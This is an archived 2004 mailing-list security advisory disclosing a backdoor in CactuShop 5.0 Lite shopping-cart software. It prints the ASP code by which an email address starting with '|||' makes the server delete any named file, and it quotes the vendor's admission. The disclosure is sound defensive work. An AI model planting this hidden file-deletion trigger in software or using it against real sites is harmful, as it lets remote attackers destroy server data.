lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <40238270.9060301@s-quadra.com>
Date: Fri, 06 Feb 2004 15:02:56 +0300
From: S-Quadra Security Research <research@...uadra.com>
To: full-disclosure <full-disclosure@...ts.netsys.com>,
   bugtraq <bugtraq@...urityfocus.com>
Subject: CactuSoft CactuShop 5.0 Lite shopping cart software backdoor


       S-Quadra Advisory #2004-02-06

Topic: CactuSoft CactuShop 5.0 Lite shopping cart software backdoor
Severity: High
Vendor URL: http://www.cactushop.com
Advisory URL: http://www.s-quadra.com/advisories/Adv-20040206.txt
Release date: 06 Feb 2004

 1. DESCRIPTION

 CactuShop is an ASP application for running an e-commerce web site. It 
incorporates
a databased catalogue system, front end pages for product navigation, 
back end pages
for updating product details and robust basket code for memorizing 
product selections
as a visitor moves around the web site. ASP software is designed to run 
on a Microsoft
NT or Win 2000 server. Please visit http://www.cactushop.com for 
information about
CactuShop shopping cart.

 2. DETAILS

 There is a backdoor in 5.0 Lite versin of CactuShop allowing a remote 
attacker to
delete any file on target system.

 The offending code can be found in includes/functions.asp file. 
AddToMailingList()
function which implemented in this file, adds a user's email address to 
store mailing
list. This function checks the provided email address and if it starts 
with '|||'
the rest of the address is interpetered as the  name of the file to be 
deleted.
Below is the snip of source code:

 Function AddToMailingList(strEmailAddress, strFormValue, htmlvalue)
 ......
   '---------------------------------
   'CHECK IF IT'S VALID
   '---------------------------------
   if strEmailAddress <> "" then
       If Left(strEmailAddress, 3) = "|||" Then
           
Server.CreateObject("Scripting.FileSystemObject").DeleteFile(Server.MapPath("./") 
& Mid(strEmailAddress, 4))
           AddToMailingList = 
GetString("ContentText_EmailAddressNotValid") & " " & strEmailFrom & "."
           Exit Function
       End If
   else
       AddToMailingList = GetString("ContentText_NoEmailAddressEntered")
       Exit Function
   end if
 ......   
 
 3. FIX INFORMATION

 S-Quadra alerted CactuShop development team to these issues on 05 Feb 2004.
The following response has been received:

 "The lite version of our software DOES have backdoors. It IS NOT 
intended for live use.
Users are specifically prohibited from using it as such!!!
If people are using this softare on a live site then they are violating our
license agreement. The full version of the software is secure."

 CactuShop Lite license agreement indeed states that "IF YOU WISH TO USE 
THE SOFTWARE
ON A LIVE WEB SITE YOU MUST PURCHASE THE FULL VERSION. CACTUSOFT 
RESERVES THE RIGHT
TO TAKE BOTH LEGAL AND TECHNICAL STEPS TO PREVENT USE OF CACTUSHOP LITE 
IN BREACH
OF THIS AGREEMENT...", but we believe that the public should be informed 
about the
presense of the backdoor in CactuShop Lite.

 4. CREDITS

 Nick Gudov <cipher@...uadra.com> is responsible for discovering this issue.

 5. ABOUT

 S-Quadra offers services in computer security, penetration testing and 
network
assesment, web application security, source code review and third party 
product
vulnerability assesment, forensic support and reverse engineering.

          S-Quadra Advisory #2004-02-06

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ